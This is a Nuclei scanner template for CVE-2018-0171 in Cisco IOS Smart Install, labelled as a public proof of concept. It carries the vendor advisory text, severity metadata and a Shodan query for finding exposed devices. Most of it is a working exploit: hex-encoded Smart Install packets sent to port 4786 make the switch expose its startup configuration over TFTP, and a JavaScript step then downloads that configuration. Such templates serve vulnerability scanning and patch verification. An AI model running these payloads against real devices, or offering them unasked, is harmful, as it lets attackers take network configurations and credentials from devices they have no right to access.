A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data.
PoC代码[已公开]
id: CVE-2018-0171
info:
name: Cisco Smart Install - Configuration Download
author: ritikchaddha,matejsmycka
severity: critical
description: |
A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data.
reference:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
- https://nvd.nist.gov/vuln/detail/CVE-2018-0171
- https://github.com/AlrikRr/Cisco-Smart-Exploit
- http://www.securitytracker.com/id/1040580
- https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-0171
cwe-id: CWE-20,CWE-787
epss-score: 0.93395
epss-percentile: 0.99805
cpe: cpe:2.3:o:cisco:ios:15.2\(5\)e:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: cisco
product: ios
shodan-query: 'port:4786 "Smart Install"'
tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev,udp,vkev,vuln
flow: tcp(1) && javascript(1)
tcp:
- inputs:
- data: 00000001000000010000000A00000050FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF555CCA6800000000000000000000000000000000FFFFFFFF00000001
type: hex
- data: 000000010000000100000008000001680001001400000001000000000021D863A560000000020154636F6E66696775726520746674702D736572766572206E7672616D3A737461727475702D636F6E666967000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
type: hex
host:
- "{{Hostname}}"
port: 4786
matchers:
- type: word
part: raw
words:
- ""
internal: true
javascript:
- pre-condition: |
isUDPPortOpen(Host,Port);
code: |
let packet = bytes.NewBuffer();
let message = "\x00\x01startup-config\x00octet\x00";
packet.WriteString(message);
let c = require("nuclei/net");
let conn = c.Open('udp', `${Host}:${Port}`);
conn.SendHex(packet.Hex());
let resp = conn.Recv(4096);
// Send malformed packet otherwise TFTP will not respond for around minute
let packet2 = bytes.NewBuffer();
let message2 = "\x00\x05error"
packet2.WriteString(message2);
conn.SendHex(packet2.Hex());
resp;
args:
Host: "{{Host}}"
Port: 69
matchers:
- type: word
words:
- 'boot-start-marker'
- 'version'
- 'NVRAM'
condition: and
extractors:
- type: regex
regex:
- "version\\s+(\\d+\\.\\d+)"
# digest: 490a0046304402203bde4d0832b2597d34a6091c50225a847acfa2d809bd4be4974e2a70fd3102a802202e68e80720dadf9faa7a789a970c1330374620a94e88dc38edd9cbbd50eb035c:922c64590222798bb761d5b6d8e72950